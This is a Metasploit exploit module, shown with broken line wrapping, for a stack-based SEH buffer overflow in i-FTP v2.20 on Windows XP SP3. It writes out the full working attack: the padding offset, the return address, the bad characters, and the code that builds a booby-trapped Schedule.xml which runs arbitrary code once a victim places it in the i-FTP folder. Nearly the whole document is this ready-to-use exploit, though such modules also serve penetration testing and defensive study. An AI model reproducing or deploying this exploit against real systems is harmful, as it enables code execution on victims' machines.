##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
require
'rexml/document'
class
Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::
FILEFORMAT
include Msf::Exploit::Remote::Seh
include
REXML
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'i-FTP Schedule Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a stack-based buffer overflow vulnerability
in
i-Ftp v2.
20
, caused by a long time value set
for
scheduled download.
By persuading the victim to place a specially-crafted Schedule.xml file
in
the i-
FTP
folder, a remote attacker could execute arbitrary code on
the system
or
cause the application to crash. This
module
has been
tested successfully on Windows
XP
SP3
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'metacom'
,
# Vulnerability discovery and PoC
'Gabor Seljan'
# Metasploit module
],
'References'
=>
[
[
'EDB'
,
'35177'
],
[
'OSVDB'
,
'114279'
],
],
'DefaultOptions'
=>
{
'ExitFunction'
=>
'process'
},
'Platform'
=>
'win'
,
'Payload'
=>
{
'BadChars'
=>
"\x00\x0a\x0d\x20\x22"
,
'Space'
=>
2000
},
'Targets'
=>
[
[
'Windows XP SP3'
,
{
'Offset'
=>
600
,
'Ret'
=> 0x1001eade
# POP ECX # POP ECX # RET [Lgi.dll]
}
]
],
'Privileged'
=>
false
,
'DisclosureDate'
=>
'Nov 06 2014'
,
'DefaultTarget'
=>
0
))
register_options(
[
OptString.
new
(
'FILENAME'
, [
false
,
'The file name.'
,
'Schedule.xml'
])
],
self
.
class
)
end
def
exploit
evil = rand_text_alpha(target[
'Offset'
])
evil << generate_seh_payload(target.ret)
evil << rand_text_alpha(
20000
)
xml = Document.
new
xml << XMLDecl.
new
(
'1.0'
,
'UTF-8'
)
xml.add_element(
'Schedule'
, {})
xml.elements[
1
].add_element(
'Event'
,
{
'Url'
=>
''
,
'Time'
=>
'EVIL'
,
'Folder'
=>
''
})
sploit =
''
xml.write(sploit,
2
)
sploit = sploit.gsub(/
EVIL
/, evil)
# Create the file
print_status(
"Creating '#{datastore['FILENAME']}' file ..."
)
file_create(sploit)
end
end